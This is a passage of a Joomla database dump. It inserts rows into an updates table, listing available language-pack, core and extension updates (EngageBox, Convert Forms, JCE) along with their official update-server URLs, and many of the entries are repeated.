(1970, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1971, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1972, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1973, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1974, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1975, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1976, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1977, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1978, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1979, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1980, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1981, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1982, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1983, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1984, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1985, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1986, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1987, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', '');
INSERT INTO `y57u5_updates` (`update_id`, `update_site_id`, `extension_id`, `name`, `description`, `element`, `type`, `folder`, `client_id`, `version`, `data`, `detailsurl`, `infourl`, `extra_query`) VALUES
(1988, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1989, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1990, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1991, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1992, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1993, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1994, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1995, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1996, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1997, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1998, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1999, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(2000, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(2001, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(2002, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(2003, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(2004, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(2005, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(2006, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(2007, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(2008, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(2009, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(2010, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(2011, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(2012, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(2013, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(2014, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(2015, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(2016, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(2017, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(2018, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(2019, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(2020, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(2021, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(2022, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(2023, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(2024, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(2025, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(2026, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(2027, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(2028, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(2029, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2030, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2031, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(2032, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2033, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(2034, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(2035, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(2036, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(2037, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(2038, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(2039, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(2040, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(2041, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(2042, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(2043, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(2044, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(2045, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(2046, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(2047, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(2048, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(2049, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(2050, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(2051, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(2052, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(2053, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(2054, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(2055, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(2056, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(2057, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(2058, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(2059, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(2060, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(2061, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(2062, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(2063, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(2064, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(2065, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(2066, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(2067, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(2068, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(2069, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(2070, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(2071, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(2072, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(2073, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(2074, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2075, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2076, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2077, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(2078, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2079, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2080, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(2081, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(2082, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(2083, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(2084, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(2085, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(2086, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(2087, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(2088, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(2089, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(2090, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(2091, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(2092, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(2093, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(2094, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(2095, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(2096, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(2097, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(2098, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(2099, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(2100, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(2101, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(2102, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(2103, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(2104, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(2105, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(2106, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(2107, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(2108, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(2109, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(2110, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(2111, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(2112, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(2113, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(2114, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(2115, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(2116, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(2117, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(2118, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(2119, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(2120, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(2121, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2122, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2123, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2124, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(2125, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2126, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2127, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2128, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2129, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2130, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2131, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2132, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2133, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2134, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2135, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2136, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2137, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2138, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2139, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
